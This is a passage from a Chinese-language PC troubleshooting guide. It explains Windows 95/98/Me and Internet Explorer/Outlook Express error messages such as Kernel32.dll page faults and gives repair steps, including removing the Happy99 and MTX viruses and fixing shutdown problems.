(2)症状:只要一激活 IE 或 OE,会出现下面其中之一的信息:
138 电脑高手知识精华
电脑高手从fcbu.com开始
Explorer caused an invalid page fault in module Kernel32.dll.
Commgr32 caused an invalid page fault in module Kernel32.dll
Mprexe caused an invalid page fault in module Kernel32.dll.
Msgsrv32 caused an invalid page fault in module Kernel32.dll.
(3)可能的原因:PWL 文件损坏,.pwl 就是操作系统用以储存密码的文件。用来储存登
入操作系统的密码,非网站窗口或是 email 等其它用途的密码。
(4)排除方法:找出所有的 .pwl 文件,并把它们删除,重新激活你的计算机,当你再次
login 的时候,无论是否输入密码(密码空白),操作系统会自己重建新的 .pwl 文件。如何
找出 .pwl 的文件?按「开始」>>「查找」>>「文件或文件夹」,在名称字段输入 *.pwl,
查询设为本地硬盘驱动器,按开始查找。找到后,把这些文件全部删除,重新激活你的计算
机,当进入 Windows 出现密码询问画面时,输入欲设定的密码值后按确定(若不需要密码,
也可以不输入,密码栏保持空白按确定)。
4、出现General protection fault in module DIBENG.DLL
(1)适用范围:Windows95、Win95 OSR2、Win98、98SE、IE 4、IE 5、Outlook 2000
(2)症状:你的 Windows 常会不定时出现下面这样的信息:
<程序名称> caused a general protection fault in module DIBENG.DLL
(3)原因: 这可能是显卡驱动程序读写不良,与操作系统有兼容性的问题,更新显卡驱动
程序即可解决问题。
(4)排除方法:把显卡驱动程序设为标准 VGA 来暂时避开这个问题,然后去显卡厂商网
站下载、安装最新的驱动程序。
5、出现EXPLORER caused an exception eedfadeH in module ARCEXT.DLL
(1)适用范围:Windows Me
(2)症状:无法使用资源管理器、复制、删除、粘贴..等功能。当使用资源管理器、「删除」、
「复制」或是「剪切」这类功能时,都会产生这样一个警告信息:发生内部错误Internet Explorer
139 电脑高手知识精华
电脑高手从fcbu.com开始
现在即将关毕,如果问题持续发生请重新启动您的计算机。
EXPLORER caused an exception eedfadeH in module ARCEXT.DLL at
0167:04a66f38。而重新启动电脑后问题还是同样存在。
(3)原因和排除方法:这可能是 WinAce 跟目前的操作系统相冲突引起的,建议删除
WinAce 后重新开机再测试这个现象是不是还会产生,因为 arcext.dll 是 WinAce 这个压缩
软件的文件。有些软件并没有办法适用于各版操作系统,每当有新的操作系统出来,有的软
件就没有办法继续用在这些新系统上,即使安装过程顺利正常,在日后使用上,也可能会遇
上一些无法预期的问题。软件的兼容性,这是我们在安装软件、或是升级操作系统时要多留
意的地方。如果想要继续使用 WinAce,建议安装适用于你目前操作系统的版本。
6、出现Explorer caused an invalid page fault in module Kernel32.dll
(1)适用范围:
Internet Explorer 4.0, 4.01, 4.01 SP1, 4.01 SP2 for Windows 95
Internet Explorer 4.0, 4.01, 4.01 SP1, 4.01 SP2 for Windows NT 4
Internet Explorer 5
Internet Explorer 5.01
Internet Explorer 5.01 for Windows 98 第二版
Windows 98
Windows 2000 Professional
Windows 2000 Server
(2) 症状:在网址列输入网址,或在“开始”/“运行”中输入命令,却出现以下其中之
一信息:
Explorer caused an invalid page fault in module Kernel32.dll
Explorer caused an invalid page fault in module Shdocvw.dll
Iexplore caused an invalid page fault in module Shdocvw.dll
(3) 原因:可能是历史文件夹 (History)损坏发生上述状况。历史
(4)排除:为了确认这个现象是不是 History 文件夹损坏造成的,先关闭「自动完成」功
能来测试,执行以下步骤以关闭「自动完成」: 控制面板/「Internet」(或 Internet 选项)/
内容/“自动完成”部分,把「自动完成 Web 网址」前的勾勾取消。按确定。如果这时你
可以顺利输入网址,不再产生问题,很可能就是 History 文件夹损坏的原因,删除 History 文
件夹(系统会自重建一个新的),应该可以解决这个问题。删除 IE 的 History 文件夹方法:
140 电脑高手知识精华
电脑高手从fcbu.com开始
(for Windows 95/98)「开始」>>「关机」>> 重新激活 Windows 98 / 95 到 MS-DOS 下。
在 DOS 命令提示符号下,输入(每行结束按 enter ):
cdwindows
deltree history
exit
现在你可以重新开启IE 的自动完成。
7、出现:磁盘整理错误代码:DEFRAG00205
(1)适用范围:Windows 95、Windows 98、Windows Me
(2) 原因与排除:这可能是 C:WindowsApplog 这个目录下文件有问题,删除掉里面的
所有文件,再测试(是删除 Applog 目录里面的文件,不是把整个 Applog 删掉)。Applog 是
隐藏文件夹。
(3)补充说明:关于 Applog,当每一个程序被执行的时候﹙不管是你执行的、还是进入操
作系统时自己执行的﹚,操作系统就会自动「监视」这些程序的执行情形,把这些纪录都放
到 Applog 这个文件夹里。你执行了哪些程序、什么时候执行的、执行频率如何、哪些是你
最常的..Windows 的 Task Monitor 会把这些资料纪录成档,每一个应用程序就是一个档案,
磁盘整理程序就会依照这些纪录,作为磁盘整理最佳化的一个依据。
这些纪录文件如果有损坏,那么磁盘整理程序就有可能在重组的过程中就会出现问题了。
这些位在 Applog 下的纪录文件都是有命名规则的,它们的文件名规则是:应用程序名
称.lgn:其中 .lgn 的「n」所代表的就是该应用程序文件所在的磁盘驱动器,如果是 C,那
就是 .lgc,如果是 f,那就是 .lgf 了,依此类推。例如 Excel.lgd 就是代表在 D 磁盘驱动
器上的执行 Excel 纪录,Notepad.lgc 就是执行位在 C 磁盘中的 Notepad﹙记事本﹚的纪
录。
当磁盘整理程序激活的时候,它便会去另外呼叫一个 Cvtaplog.exe 程序,去收集所有的这
些 lgn 档案里的信息,再建立一个 Applog.dtn 檔。每一个磁盘驱动器都会有一个属于它的
Applog.dtn﹙例如 E 磁盘驱动器就是 Applog.dte....﹚,磁盘整理程序就依照这些 dtn 文件
里的资料,把文件放到磁盘上最适当的位置,用以加快程序激活时的速度﹙减少搜寻的时间
﹚。
Applog 里面的纪录文件、或是 Applog 本身如果你把它删除了,操作系统还是会自动重
建。
141 电脑高手知识精华
电脑高手从fcbu.com开始
8、点击 Internet Explorer 之后,桌面一片空白,出现以下错误信息:
A、Explorer has caused an invalid page fault in module Kernel32.dll
B、Explorer has caused an invalid page fault in module Explorer.exe
C、Iexplore has caused an invalid page fault in module Browseui.dll
D、Microsoft Internet Explorer... 内部发生错误...
(1)适用范围: Windows 98、Internet Explorer 5.0
(2)症状:安装了 IE 之后,重新激活计算机,会出现上述A、B、C、D 项中的其中之一信
息,并且桌面一片空白,激活到安全模式,桌面也是一片空白 :
(3)原因:如果 Registry 的值不正确,就可能发生这种情形。
(4)排除方法:
·重新启动计算机,按 F8 不放,会出现开机选单,选择 Command Prompt Only
·待系统提示符号出现,输入:scanreg /restore,回车;
·这时会激活 Registry Checker 程序,选择一个在出问题之前的 registry 来还原(可以依照
日期来判断,例如今天发生状况,你就可以拿昨天的来还原)。
如果你的计算机还能够正常显示桌面:
·开启控制面板,到添加/删除程序,到添加/删除,选择 Internet Explorer 5 及 Internet 工
具,按添加/删除,选择修复 Internet Explorer。
如果桌面一片空白:
·按 Ctrl + Alt + Del 去激活 Task Manager (taskman.exe),到「开始」>>「运行」,输入:
control appwiz.cpl
·选择 Internet Explorer 5 及 Internet 工具,按添加/删除,选择修复 Internet Explorer。
·依照画面指示,若需要重新开机,就重新激活你的计算机。
142 电脑高手知识精华
电脑高手从fcbu.com开始
9、邮件传送附件,出现发生这个程序执行无效,即将关闭(Happy 99 病毒引起的问题)。
Happy99.exe 会让 OE 传送件时,产生下面几种错信息之一:
·MSIMN caused an invalid page fault in module KERNEL32.dll
·MSIMN caused an invalid page fault in module unknown Explorer caused an invalid page fault
in module mailnews.dll at xxxxxxxxx
·Outlook caused an Invalid Page Fault in module Unknown
·Msimn caused an invalid page fault in module inetcomm.dll
如果你是使用Outlook 98 的话,Happy99 会让你的Outlook98 产生:
· MAPI32 caused an invalid page fault in module Kernel32.dll
受影响的OE 版本有:
1、 Outlook Express 4.0, 4.01, 4.01 Service Pack 1, 4.01 Service Pack 2
2、Outlook Express 5 for Windows 95
3、Windows 98
4、Windows 98 Second Edition
5、Outlook 98
6、Internet Mail and News version 1.0 for Windows 95
7、Outlook Express 4.0, 4.01, 4.01 Service Pack 1, 4.01 Service Pack 2
8、Outlook Express 5 for Windows NT 4.0
9、Windows NT Server 4.0
Windows NT Workstation 4.0
重新激活计算机,如果是Windows 98,则按住 F8 键不要放,就会进入开机选单,请选 Safe
Mode Command Prompt Only:
143 电脑高手知识精华
电脑高手从fcbu.com开始
照下面指令输入,每行指令结束按 Enter :(由于本例会使用到 DOS 指令,对初阶使用者
而言,如果你没有把握,建议你用防毒软件来排解问题,或者找有经验的人在旁边指导你。)
· cd windowssystem
· del ska.dll
· del ska.exe
· ren wsock32.dll wsock32.old
· copy wsock32.ska wsock32.dll
·(以上是:删除 Windows/System 目录下的 ska.dll、ska.exe,把 wsock32.dll rename 或删
除,再把 wsock32.ska 改名为 wsock32.dll)
.重新开机,即可。
注意,如果你执行过 happy99.exe 很多次的话,wsock32.ska 本身就可能是带原者了,改
名回 wsock32.dll 也不管用,这时候,你找一台干净的计算机,把它的wsock32.dll 复制过
来就可以。
或是从原版光盘中解压抽出 wsock32.dll 这个档。
[ 补充说明 ]
1、Happy99 会把你原本正常的 wsock32.dll 改名为 wsock32.ska
2、你若执行 happy99.exe,会出现放烟火画面。
10、点击 Internet Explorer 等图标 ,出现:Explorer Caused an Invalid Page Fault in Pdm.dll
1、适用范围:Windows 98 二版
2、使用资源管理器,或是 IE 5,或打开桌面上我的电脑图标,常常不定时发生﹙不一
定每次都会 发生﹚:Explorer Caused an Invalid Page Fault in PDM.DLL
3、原因:这是微软的 Bug,起因是 PDM.DLL ﹙Process Debug Manager﹚版本跟操作
系统起冲突,你的 PDM.DLL 这个文件并不支持目前的操作系统,很多的微软开发工具软
件都会安装 PDM.DLL 到你的计算机里,如果你所安装的开发软件与操作系统不合,就可
能产生这个现象。
144 电脑高手知识精华
电脑高手从fcbu.com开始
4、 排除方法一:目前已知在 Windows 98 第二版上安装 Visual Studio 6 会发生这个现
象,如果你必须安装 Visual Studio 6 的话﹙或其中之一的软件,如 Visual C++ 等等﹚,建
议安装之后,再安装 Visual Studio 的 Service Pack,以预防产生这个现象。
删除 Visual Studio 6.0 或是安装 Visual Studio 6.0 的修正程序( Microsoft Visual Studio 6.0
Service Pack 3),就可以解决。
排除方法二:有些用户电脑根本没有安装什么程序开发工具,为什么也会有这个现象?
其电脑里为什么也会有 PDM.DLL?虽然有些用户没有安装 Microsoft Visual Studio 这套程
序开发软件(例如 Visual Basic、Visual C++ ....这类) ,但是却会出现这个信息,这可能是
某套应用软件安装上去的,因为这个软件是利用 Visual Studio 开发的,而开发厂商也许疏
忽,把不需包的文件也包到产品里。对此可直接把 PDM.DLL 更名或删除就可以了,也可
在 C:WindowsSystem 文件夹下找到 PDM.DLL,把它删除或更名。
11、输入网址后,出现:EXPLORER caused an invalid page fault in module WININET.DLL
1、适用范围:IE 5 .x
2、症状:在网址列输入网址之后,按 enter,IE 就出现:
IEXPLORE caused an invalid page fault in module WININET.DLL at ........
3、原因:这可能是「自动完成」这个功能所需要的文件损坏,造成 IE 或文件没有办法
取得所需要的资料,而产生这种现象,所以先试着删除这些文件,测试是否能够解决问题。
4、排除方法:先开启 IE ,到工具 >> Internet 选项,去清除 Temporary Internet Files 以
及 History ,然后测试是否问题已经解决,如果依旧,请再继续以下的步骤。
·开启 IE5,到「工具」>>「Internet 选项」,到「高级」。取消浏览器的「自动完成」功能,
不要勾:「使用实时自动完成Web 网址」,按确定。
·接着照下面步骤,删除毁损的文件:
重新开机,进入「Command Prompt Only」(开机时按 F8 不放,等开机选单出现,选 Command
Prompt Only,按 Enter)
输入 DOS 指令,删除特定文件夹中的内容(Download、Temporary Internet Files、History、
Cookies),如果你熟 DOS 的话,应该知道下面几行是在做什么,如果你不会 DOS,请依
样输入,每行指令结束记得按 Enter。
下面这几行指令的意思:到 Windows 下 Download 文件夹里,用 DEL 命令删掉所有文件,
145 电脑高手知识精华
电脑高手从fcbu.com开始
问你是否确定,按 Y 表示是。
cd windowsdownlo~1
del *.*
y
cd
cd windowstempor~1
del *.*
y
cd
cd windowshistory
del *.*
y
cd
cd windowscookies
del *.*
·重新开机,到此可以说是完成了,如果你需要「自动完成」这个功能的话,再参考前面的
地方,把自动完成勾回去。
注意:这里所说的删除是指「删除特定文件夹中的内容」,而不是把整个文件夹删掉。
12、无法执行新接龙
适用范围:Windows 98 第二版
当一执行新接龙,就会出现以下讯息:
FREECELL caused a general protection fault in module CARDS.DLL at ....
原因:这是 Pc-cillin 98 Plus 造成的,停用或删除 Pc-cillin 98 Plus,或是升级你的 Pc-cillin
98 到最新的版本,就可以解决这个问题。
13、关机时出现Protection Error 或计算机没有响应
146 电脑高手知识精华
电脑高手从fcbu.com开始
1、适用范围:Windows 98、Windows 98 第二版
2、原因:造成 Windows 98 关机不正常的原因很多、很复杂,不良的软件、硬件兼容的
问题(例如:主机板芯片组、VGA 卡、网络卡等等)、驱动程序、BIOS 设定错误等等,都
有可能造成操作系统没有办法正常关机。
这一篇所介绍的案例,是防毒软件引起的,如果你并没有安装防毒软件,这篇文章就不
适用于你的环境。
当你关机的时候,你的计算机会出现以下(或其中之一)的状况:
·出现 Windows protection error , you need to restart your computer 的错误讯息。
·软盘机灯号一直亮着。
·一直停留在「正在关机」的画面。
目前已经知道旧版的 McAfee 或是 Norton Anti-Virus 会造成这个现象,解决方法:删
除杀毒软件,或是,升级你的杀毒软件。
14、Windows 98 不能正常关机(无法正常关机)
1、适用范围:Windows 98、Windows 98 第二版 (Second Edition)、Windows Me
2、症状:「安装了 Windows 98 SE 之后,选择关闭计算机时,计算机却重新开机。
3、原因:由于 Windows 98 第二版(或 Windows Me)采用了新的电源管理核心, 使得
在 Windows 98 下正常关机的计算机,到了 Windows 98 第二版上,就不见得可以正常关
机(旧型主机板常见)。此外,任何软硬件冲突,也会造成关机不正常。
4、排除方法:如果你的计算机没有办法正常关机的话(重开机、或停留在关机画面), 就
可往以下几个方面去找问题:
·是不是有常驻软件影响到关机(例如防毒软件)
·检查主机板芯片组、显示卡、网络卡、声卡,这类驱动程序或软件是不是太旧需要更新,
是不是有 IRQ、DMA 或 I/O port 冲突的问题。
·BIOS 内容是否设定错误,造成关机不正常。(建议参考主机板使用手册上的一些建议设
定值或注意事项)
147 电脑高手知识精华
电脑高手从fcbu.com开始
·检查 IRQ、DMA 是否起冲突,是否有两个以上的设备(或适配卡)抢占同一个 IRQ 或
DMA,若 IRQ 起冲突,在开机、关机的时候也常会产生 invalid page fault 或 fatal exception
error 0E 的错误信息。
·主机板 BIOS 版本是否太旧需要更新
你关机时,如果你的计算机重新开机、或是一直停留在正在关机的画面,都可以照以下方
法来试着解决,但是:如果你 Windows 一切都很正常,可以正常关机,请不要好奇依照下
面方法去更动你的计算机的设定,这只提供给关机不正常的计算机使用。
如果在原本旧有作业系下一切正常,升级到新的操作系统下就不能关机(如 Windows 95、
Windows 98 升级到 Windows 98 第二版),则请考虑下载 Windows 98 第二版关机修正程
序、或更新你主机板 BIOS 两种方法。
第一、更改软件设定值,或更新驱动程序:
1、 开始>>执行,输入 msconfig(系统配置编辑器),按「高级」按钮,把「取消快速
关机」勾起来,按确定。关机,看看正不正常(多半关机却重新开机都可以经由此法解决)。
2、删除杀毒软件,再关机,如果正常,你必须更新你的杀毒软件。
3、 删除网卡驱动程序,如果删除后正常,就更新网卡驱动程序。
4、删除所有 real mode 下的驱动程序,重开机后再做关机测试。(就是 DOS 下的设备驱动
程序,挂在 Config.sys 里或是 Autoexec.bat 里,Windows Me 或者没有此两档的 Windows
98 则不用做这项测试)
5、删除所有会在「激活」群组中加载的程序(是不是曾经安装过一些常驻软件因而影响到
关机)。
第二、检查 BIOS 设定:
因为每家主机板商使用的 BIOS 版本、制造商都不尽相同,况且 BIOS 日新月异,这里
不可能全部详细列举出来,更不可能举出连设定名称都一模一样,你的 BIOS 也有可能没
有下列项目,或是下面叙述并不与你的 BIOS 中的名称一模一样,这里只是提供你一个寻
找的参考方向。(BISO 厂牌主流虽只有一、二家,但市面上可见到的BIOS 厂牌仍然不少,
各家画面都有差异,我没有办法一一举例,某些 BIOS 中可能没有以下设定项目)
1、Assign IRQ for VGA :设 Enable ( PnP/PCI Configuration )
2、PnP OS Installed: 须设NO(PnP/PCI Configuration )
148 电脑高手知识精华
电脑高手从fcbu.com开始
3、Power Management Setting :所有电源管理项目设 Disable 。
4、Wake on LAN/Flash on LAN :设 Disable ( 如果你的 BIOS 里有此项的话 )
5、以上都无效,再把 BIOS Shadowing 所有 shadowing 全部 Disable。( 一般是在BIOS
Features Setup 项中 )
第三、下载 Windows 98 第二版关机修正程序:
如果你试过更改软件设定、更改 BIOS 设定后,还是不能正常关机,就下载 Windows 98
第二版关机修正程序。
(仅适合 Windows 98 第二版且关机不正常者使用,98 第一版不要下载安装,避免产生意
外。WIndows Me 的用户请参考 Windows Update 网站上是否有专门提供给 Windows Me
的关机修正程序)
以下是微软网站:(for 98 SE only)
http://www.microsoft.com/windows98/downloads/contents/
WURecommended/S_WUFeatured/Win98SE/Default.asp
或者前往 Windows Update 网站, 检查是否有新的关机修正程序:
windowsupdate.microsoft.com
第四、更新你主机板 BIOS:
试过以上方法都无效,到你的主机板制造商或计算机制造商的网站去看看,看它有没有
提供新版本的 BIOS 下载,来解决这个问题。至于如何更新你主机板BIOS ,请参考你主
机板制造商网站上之说明。
请注意:更新BIOS 不是万灵丹,不少人都把一切不正常的责任归给「BIOS 太旧」,这
个观念不对的,很多时候,是因为适配卡冲突、设定上的疏忽等才使得操作系统不能关机,
一开始就把原因推给 BIOS 这是不对的想法。
BIOS 是主机板上很重要的一个设备,需要更新的机率实在不大,「更新 BIOS」只是最后
一个方法了,已经可以说是没有方法中的方法,所以你不要对更新 bios 有太大的期望,
以为只要更新,什么事都OK 了。
除非主机板制造商的网站建议你更新,或是你目前的 bios 版本有重大瑕疵需要更新,
否则,不要随意更新 bios,尤其是对新手,如果你连 bios 是什么都不知道,那表示你不懂,
为了安全,你不要自己动手做,请有经验的人在旁边帮助你。
149 电脑高手知识精华
电脑高手从fcbu.com开始
若经由以下的设定之后,可以正常关机,或许是 BIOS 需要更新或是 BIOS 设定有错。
A、停用 IRQ Steering:
1、我的电脑/按右键/属性/设备管理/系统设备,选择「 PCI 总线( PCI bus)」,按「属性」,
不要勾「 IRQ 指导」。按确定,重新开机,开机后,再直接关机。
B、取消 NVRAM / ESCD 更新:
1、我的电脑/按右键/属性/设备管理/系统设备,展开系统设备。选择Plug and Play BIOS(即
插即用BIOS),按属性/设置,不要勾:NVRAM / ESCD 更新(N) 。
4、按确定,重新开机,开机后,再直接关机。
注一:
如果关机时停留在「您可以放心关机」画面,而不会自动 Power Off,Power Management 中
的设定必须是「User define、Max、Min」三者其中之一,而不能是「Disable」,若设为 Disable
否则无法自动关机断电,你要亲手按下 Power 钮才能断电。
以上在 Power Management 中的设定是针对支持由 ATX 规格电源供应器供电的主机板而
言,若你的主机板是属于老式的 AT 主机板,因 AT 主机板、AT 电源供应器,本身就不
支持软件自动关机,所以你还是得亲手按下 Power,才能关掉电源。
电脑出现错误信息的故障排除(3)
15、浏览某些网站经常出现:IEXPLORE caused a general protection fault in module
NVDISP.DRV
1、适用范围:Internet Explorer 4.x、5.x
2、症状:在浏览某些网站的时候,经常出现:
IEXPLORE caused a general protection fault in module NVDISP.DRV at xxxx........
3、原因:这是一个老问题,可能是显示卡驱动程序与IE 5 不兼容造成的,Display Driver 与
IE 5 息息相关,撰写不良的显示卡驱动程序经常是祸首。
150 电脑高手知识精华
电脑高手从fcbu.com开始
4、排除方法:到你所使用的的显示卡厂商的网站下载并安装最新版驱动程序,再重新测试,
应该可以解决。
16、播放电影,出现Iexplore caused an invalid page fault in module KERNEL32.DLL
1、适用范围:Internet Explorer 5;Internet Explorer 5.01;Internet Explorer 5.5
2、症状:以 IE 5.0 点选网页上的 RealPlayer 影片,欲播放 RealPlayer 的影像时,IE 会
出现以下其中之一讯息,并且造成计算机没有任何反应。
· Iexplore caused an invalid page fault in module KERNEL32.DLL at xxxx:xxxx
· Iexplore 造成 KERNEL32.DLL 错误,Iexplore 现在会关闭。若还发生问题,
请重新激活计算机。 Iexplore 造成 <不详> 发生错误,Iexplore 现在会关闭。若还发生问
题,请重新激活计算机。按下「关闭」后,计算机没有任何反应,必须重新开机。
3、原因:当IE5 浏览器没有安装 RealPlayer Plugin 而直接播放网页上 RealPlayer Video 的
时候,就会发生这个问题,从现象看来,应该是IE5 本身的问题,在IE4 上并不会产生这
种情形。
4、解决方法:只好采取回避的方法,未安装 RealPlayer 之前,尽量避免点选网页上的
RealPlayer Video。先确认你的计算机上是否已经装有 RealPlayer 播放软件,安装好
ReapPlayer 播放软件之后,再去点选网页上的 RealPlayer Video。
17、查阅邮件,出现Iexplore caused an invalid page fault in urlmon.dll
1、适用范围:Internet Explorer 4 以后
2、症状:每次在某些网站上要开启某 folder 看信时,总会出现Iexplore caused an invalid page
fault in urlmon.dll。
3、原因:urlmon.dll 是用来控制 URLDownloadToCacheFile 函数,因此也许是 IE 的快取
区中有文件损坏,所以产生这个现象,清除所有快取(Cache)文件后,再测试这个现象还
会不会产生。
4、排除:如何清除 IE 的 Cache?就是清除 Temporary Internet files、History、以及 Cookies
三大项目,以下以 IE 6 为例做说明:
151 电脑高手知识精华
电脑高手从fcbu.com开始
· 打开启IE,到「工具」>>「Internet 选项」,分别点击删除 Cookies;删除文件;
删除历史记录。(或到「控制面板」>>「Internet 选项」也可操作)
· 由于 IE 6 之前的版本,并没有提供直接删除 Cookies 这个按钮,如果是 IE 5.x
的用户,删除 Cookies 的方法是:在Internet 临时文件中,点击“设置”/查看文件,「编辑」
>>「全选」,然后全部删除。
18、查阅邮件,出现MTX_cause an invalid page fault in module MTX_EXE at ...
1、适用范围:Windows 95;Windows 98;Windows Me;Outlook Express 全系列
2、症状:当在你每次收信的时候,经常出现下面的错误讯息:
MTX_cause an invalid page fault in module MTX_EXE at 0167:0040159d
或是使用 IE 浏览网站的时候,也常经常出现这样的讯息:
IEXPLORE caused a stack fault in module WSOCK32.DLL at 017f:76049c2f
3、原因:可以肯定的说,你的电脑已经被 MTX 病毒感染,这个病毒是透过 email 附件传
染的,如果你因为一时的好奇而去执行了这个夹在邮件中的附件文件,那么就会受到感染。
(不去执行,直接删除这邮件就不会受感染)
这个病毒的移除方法有点复杂,并不是很简单,它除了改掉了原版的 wsock32.dll、run32.dll
之外,也修改了 registry,所以只靠复制正常的 wsock32.dll 盖过有问题的 wsock32 并不能
解决问题。
4、排除方法:请到以下两网站看排除参考
Symantec 关于 MTX 的网址:
http://www.symantec.com/avcenter/venc/data/w95.mtx.html
趋势科技关于 MTX 的网址:
http://www.trend.com.tw/endusers/security/blacklist.htm
19、经常出现Kernel32.dll 错误信息
152 电脑高手知识精华
电脑高手从fcbu.com开始
(一)适用范围:Windows 全系列
(二)症状:Windows 三天两头出现 Kernel32.dll 的错误信息,或突然出现"非法操作"的
提示,即使重新装操作系统也是一样出现同样状况,这可能就跟软件没有什么关联,而有可
能与硬件的错误有关。那么kernel32.dll 是什么,如何应对与解决这类问题呢?
(三)什么是kernel32 内核文件。kernel32.dll 是Windows 9x/Me 中非常重要的32 位动态链
接库文件,属于内核级文件。它控制着系统的内存管理、数据的输入输出操作和中断处理,
当Win dows 启动时,kernel32.dll 就驻留在内存中特定的写保护区域,使别的程序无法占用
这个内存区域。有时,Windows 会弹出"非法页错误"的消息框,简单地说,这是因为某个或
多个程序试图访问kernel32.dll 所占用的内存保护区域,从而产生冲突而造成的。该错误一
般由某个特定的程序引起,也可能是多个文件或程序。如果是由某个程序引起,那么可以尝
试重新安装或升级该程序来解决问题,而如果由多个文件和程序引起,那就极有可能是因损
坏的硬件设备驱动而引起的。
(四)原因:引起kernel32 出错的主要元凶有以下几点
1.Windows 自身的临时交换文件被破坏;
2.文件分配表(FAT)出现错误;
3.用户名和密码列表错误;
4.装载了已经被破坏的或者是不正确版本的ker -nel32.dll 文件;
5.注册表文件被损坏;
6.计算机硬件有问题,如CPU 过热、超频使用、损坏的电源、地线波动、射频噪音、
损坏的磁盘控制器;
7.BIOS 中等待状态设置出现问题,或者RAM 时钟有错误;
8.已经损坏或者没有正确、完整地安装软件;
9.临时文件夹不存在或者已经损坏;
10.损坏的控制面板文件(扩展名为cpl);
11.不正确或者已经损坏的硬件驱动程序;
12.没有正确安装打印机驱动程序;
13.Java 设备错误;
14.已经被破坏的.LOG 日志文件;
15.访问历史文件夹错误;
16.不合适的或损坏的动态链接库文件;
17.机器感染了病毒;
18.损坏的或者不正确版本的msinfo32.exe 文件;
19.磁盘空间不足。
(五)排除方法:行之有效的解决方案知道了哪些情况可能引起kernel32.dll 文件出问题,
那么就可以采取排除法一一解决。不过,在大多数情况下,建议优先实施以下解决方案:
1.错误的内存模块:用"记事本"打开根目录下的config.sys,并在其中插入命令行:
DEVICE=C:WINDOWSHIMEM.SYS /TESTMEMN,然后在电脑重启时观察屏幕所显示的
HIMEM has de tect ed unreliable mem o ry at ad dress xxxxxxxxx,这样就可以基本确定内存出
了问题。不过,这可能需要重启几次来逐一发现。当然也可以下载、运行相应的系统诊断软
件,特别是内存检测软件;
2.错误的显卡驱动程序:最新版本的显卡驱动程序可以保证显卡更加稳定、高效地运行,
153 电脑高手知识精华
电脑高手从fcbu.com开始
因此你要确保显卡驱动程序是最新版本;
3.超频CPU、总线速度:如果想要你的电脑运行得更加稳定、持久,建议不要将CPU
和总线超频使用,恢复到默认值;
4.CPU 或者电源风扇转速不正常或落满灰尘:风扇的不稳定可能导致CPU 或电源温度
过高,从而引起系统不稳定。CPU 风扇可以用小刷子和吹风机处理,电源风扇则需要由专
业人员清扫;
5.图形加速设置过高:右击"我的电脑",选择"属性"命令,在"性能"选项卡中选择"图形
"按钮,将硬件加速调低一个刻度,然后确定后重启,如果还有问题,再重复以上步骤继续
往下调低一个刻度,直到正常为止;
6.动画光标、鼠标轨迹和活动桌面:这些花哨的设置都有可能引起kernel32.dll 错误,
尝试禁用这些功能,然后再一个一个激活这些功能,直到发现错误为止;
7.相当有效的解决方案:实践证明这个方法解决过许多ker- nel32.dll 崩溃的问题。在C
盘根目录下,用"记事本"创建或者直接修改系统配置文件config.sys,在其中加入如下3 行
语句:
FILES=65
BUFFERS=40
STACKS=64,512
如果错误仍然存在,可使用"记事本"打开系统文件夹下(如〈C:Windows〉)的system.ini
文件,然后在[386Enh]节上加入如下两行语句:
; Increases default stack pages from 2 to 6
MinSPs=6
(MinSPs 默认值是2,如需要,每次增加2 直到解决问题为止,而第一句前面的";"主要
起注释作用。)
修改好后保存退出,重启使之生效。
8.删除临时交换文件:如果错误仍然存在,可以尝试删除Windows 的临时交换文件
Win386.swp 来解决问题,不过该文件无法在Windows 下删除,你需要退到DOS 实模式下
进行,进入系统目录(如C 盘〈Windows〉目录)删除Win386.swp,当系统重启后Windows
会重新生成该文件。
9.密码列表损坏:如果系统密码列表文件被损坏也会引起错误,这时需要重建该文件,
在"资源管理器"中选择〈Windows〉文件夹,然后按下F3 调出查找对话框,在文件名中键
入:*.pwl,然后进行查找,当符合条件的文件列出来后,将它们全部删除掉,接着重启,
让系统重建密码列表文件。
10.病毒:如果系统显示的是MSIMN 错误导致kernel32.dll 产生无效页面错误,那么你
的电脑很有可能被Happy 99 蠕虫病毒所侵害,你需要使用杀毒软件对你的系统进行一下清
除。
· 此外,如内存品质不稳造成的,可在Config.sys 中加入下面这一行来测试
内存:
DEVICE=C:WINDOWSHIMEM.SYS /TESTMEM:ON
(不一定要在 DOS 下编辑 config.sys,可以到开始 >> 执行,输入msconfig,在config.sys
这页里去编辑就可以)
154 电脑高手知识精华
电脑高手从fcbu.com开始
电脑出现错误信息的故障排除(4)
20、开机出现:MMTASK caused an invalid page fault in module TINTIME.DLL
1、适用范围:Office 2000;Windows 98;Windows 98 第二版;Windows Me;微软拼音
98;微软拼音 98a
2、症状:开机之后,一进入 Windows 系统就会出现:
MMTASK caused an invalid page fault in module TINTIME.DLL at xxx:xxx (有时可能是
Mprexe caused aan invalid page fault in......TINTIME.DLL)
3、原因:微软拼音(98)在某些环境的组合下会产生这个问题。当你一进入 Windows ,
就会出现:Mprexe caused aan invalid page fault in......TINTIME.DLL
4、排除方法:不要把微软拼音设为预设的输入法,到控制面板>>键盘>>语言,只要把键
盘语言设为「English(United States)」就可以避开这个问题。
万一出现这信息后,你没有办法顺利进入控制面板的话,就重新激活计算机,进入安全模式
(Safe Mode),再去控制面板里设定。
到「控制面板」里的「键盘」,到「语言」这一页,选择「English(United States)」,再按
「设成默认值」钮,按确定。重启电脑。
此外,当安装 Office 2000 快结束时,问你是否要将微软拼音﹙98a﹚设为预设的输入法,
如果你选了「是」,产生问题的机率就会很大﹙因为这个动作会把你原本为英文的键盘语系
设成中文﹚。建议安装 OFFICE 2000 快结束时,当问你是否要安装微软拼音的时候,按取
消(不管你原先是否装有微软拼音,到此画面时,一律按取消),可避开这个现象。
21、检查新邮件时出现:MPREXE Causes Invalid Page Fault
1、适用范围:Outlook 98
2、症状:当你要检查新进邮件的时候,Outlook 98 就出现:
MPREXE caused an invalid page fault in module Kernel32.dll
155 电脑高手知识精华
电脑高手从fcbu.com开始
3、原因:这是因为密码文件损坏,找出密码文件,就是 .pwl 的文件,全部删除即可。
4、排除方法:「开始」>>「查找」>> 「文件或文件夹」,在名称字段输入 *.pwl,搜索设为
本地硬式硬盘驱动器,按「开始查找」。删除所有的 .pwl 文件(若你不放心,你可以把他
们改名,只要扩展名不是 pwl 就可以)。重启电脑。当进入 Windows 的时候,Windows 会
询问ID 与密码,如果不希望每次进入 Windows 的时候,都询问你密码,那么密码栏就保
持空白,按确定。但是 ID 一定要输入,你不可以按取消跳过这个询问画面,否则没有办
法产生 pwl 文件。
22、打开 IE 或 OE,出现Explorer caused an invalid page fault in module Kernel32.dll
1、适用范围:Internet Explorer
2、症状:只要一打开 IE 或 OE,会出现下面其中之一的信息:
